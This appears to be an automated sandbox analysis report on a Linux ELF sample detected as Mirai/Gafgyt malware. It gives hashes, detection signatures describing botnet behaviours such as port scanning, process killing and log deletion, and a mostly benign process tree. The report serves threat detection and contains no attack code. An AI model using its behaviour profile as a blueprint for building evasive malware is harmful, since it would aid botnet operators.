Loading ...

Play interactive tourEdit tour

Linux Analysis Report 01oHMcUgUM

Overview

General Information

Sample Name:01oHMcUgUM
Analysis ID:553470
MD5:14c3173a21e8dd262999e2ab8c2833f4
SHA1:efc2c18ac9a0f9dab71930037496cc676fa18bea
SHA256:dec1840b49d9d7303369f1ce3efec379e86bd7095a4a2630b2c3df18ab1a12f4
Tags:32elfmirairenesas
Infos:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553470
Start date:15.01.2022
Start time:00:13:48
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:01oHMcUgUM
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.lin@0/200@12/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5192, Parent: 1)
  • logrotate (PID: 5192, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5233, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5234, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5235, Parent: 5234)
      • invoke-rc.d (PID: 5235, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5236, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5239, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5242, Parent: 5235, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5243, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5244, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5245, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5246, Parent: 5245)
      • rsyslog-rotate (PID: 5246, Parent: 5245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5247, Parent: 5246, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5193, Parent: 1)
  • install (PID: 5193, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5232, Parent: 1)
  • find (PID: 5232, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5241, Parent: 1)
  • mandb (PID: 5241, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • 01oHMcUgUM (PID: 5263, Parent: 5117, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/01oHMcUgUM
  • systemd New Fork (PID: 5289, Parent: 1)
  • journalctl (PID: 5289, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5305, Parent: 1)
  • systemd-journald (PID: 5305, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5308, Parent: 1)
  • journalctl (PID: 5308, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5360, Parent: 1)
  • dbus-daemon (PID: 5360, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5370, Parent: 1)
  • whoopsie (PID: 5370, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5372, Parent: 1860)
  • pulseaudio (PID: 5372, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5377, Parent: 1)
  • systemd-logind (PID: 5377, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5386, Parent: 1)
  • rtkit-daemon (PID: 5386, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5440, Parent: 1)
  • polkitd (PID: 5440, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5448, Parent: 1)
  • rsyslogd (PID: 5448, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5449, Parent: 1)
  • agetty (PID: 5449, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 5450, Parent: 1320)
  • Default (PID: 5450, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5451, Parent: 1320)
  • Default (PID: 5451, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5452, Parent: 1320)
  • Default (PID: 5452, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5456, Parent: 1)
  • gpu-manager (PID: 5456, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5457, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5458, Parent: 5457)
      • grep (PID: 5458, Parent: 5457, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5459, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5460, Parent: 5459)
      • grep (PID: 5460, Parent: 5459, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5461, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5462, Parent: 5461)
      • grep (PID: 5462, Parent: 5461, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5463, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5464, Parent: 5463)
      • grep (PID: 5464, Parent: 5463, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5465, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5466, Parent: 5465)
      • grep (PID: 5466, Parent: 5465, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5467, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5468, Parent: 5467)
      • grep (PID: 5468, Parent: 5467, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5472, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5473, Parent: 5472)
      • grep (PID: 5473, Parent: 5472, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5474, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5476, Parent: 5474)
      • grep (PID: 5476, Parent: 5474, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5478, Parent: 1)
  • generate-config (PID: 5478, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5494, Parent: 5478, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5495, Parent: 1)
  • gdm-wait-for-drm (PID: 5495, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5500, Parent: 1)
  • gdm3 (PID: 5500, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5505, Parent: 5500)
    • plymouth (PID: 5505, Parent: 5500, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5523, Parent: 5500)
    • gdm-session-worker (PID: 5523, Parent: 5500, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5527, Parent: 5523, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 5531, Parent: 5527, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 5533, Parent: 5531)
            • false (PID: 5534, Parent: 5533, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 5535, Parent: 5527, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 5536, Parent: 5535, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 5537, Parent: 5500)
    • Default (PID: 5537, Parent: 5500, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5538, Parent: 5500)
    • Default (PID: 5538, Parent: 5500, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5506, Parent: 1)
  • accounts-daemon (PID: 5506, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5518, Parent: 5506, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5519, Parent: 5518, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5520, Parent: 5519, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5521, Parent: 5520)
          • locale (PID: 5521, Parent: 5520, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5522, Parent: 5520)
          • grep (PID: 5522, Parent: 5520, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • fusermount (PID: 5545, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5567, Parent: 1)
  • journalctl (PID: 5567, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5568, Parent: 1)
  • systemd-journald (PID: 5568, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5569, Parent: 1)
  • dbus-daemon (PID: 5569, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5570, Parent: 1)
  • whoopsie (PID: 5570, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5575, Parent: 1)
  • systemd-logind (PID: 5575, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5635, Parent: 1860)
  • pulseaudio (PID: 5635, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5636, Parent: 1)
  • gpu-manager (PID: 5636, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5637, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5638, Parent: 5637)
      • grep (PID: 5638, Parent: 5637, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5641, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5642, Parent: 5641)
      • grep (PID: 5642, Parent: 5641, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5646, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5647, Parent: 5646)
      • grep (PID: 5647, Parent: 5646, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5651, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5652, Parent: 5651)
      • grep (PID: 5652, Parent: 5651, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5653, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5654, Parent: 5653)
      • grep (PID: 5654, Parent: 5653, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5659, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5660, Parent: 5659)
      • grep (PID: 5660, Parent: 5659, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5664, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5665, Parent: 5664)
      • grep (PID: 5665, Parent: 5664, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5667, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5668, Parent: 5667)
      • grep (PID: 5668, Parent: 5667, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5640, Parent: 1)
  • rtkit-daemon (PID: 5640, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5645, Parent: 1)
  • polkitd (PID: 5645, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5655, Parent: 1)
  • rsyslogd (PID: 5655, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5658, Parent: 1)
  • agetty (PID: 5658, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5666, Parent: 1)
  • journalctl (PID: 5666, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5671, Parent: 1)
  • journalctl (PID: 5671, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5672, Parent: 1)
  • systemd-journald (PID: 5672, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5674, Parent: 1)
  • generate-config (PID: 5674, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5675, Parent: 5674, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5679, Parent: 1860)
  • dbus-daemon (PID: 5679, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5680, Parent: 1)
  • gdm-wait-for-drm (PID: 5680, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5681, Parent: 1)
  • whoopsie (PID: 5681, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5683, Parent: 1)
  • dbus-daemon (PID: 5683, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5688, Parent: 1)
  • systemd-logind (PID: 5688, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5746, Parent: 1)
  • journalctl (PID: 5746, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5747, Parent: 1860)
  • pulseaudio (PID: 5747, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5752, Parent: 1)
  • rtkit-daemon (PID: 5752, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5756, Parent: 1)
  • polkitd (PID: 5756, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5760, Parent: 1)
  • rsyslogd (PID: 5760, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
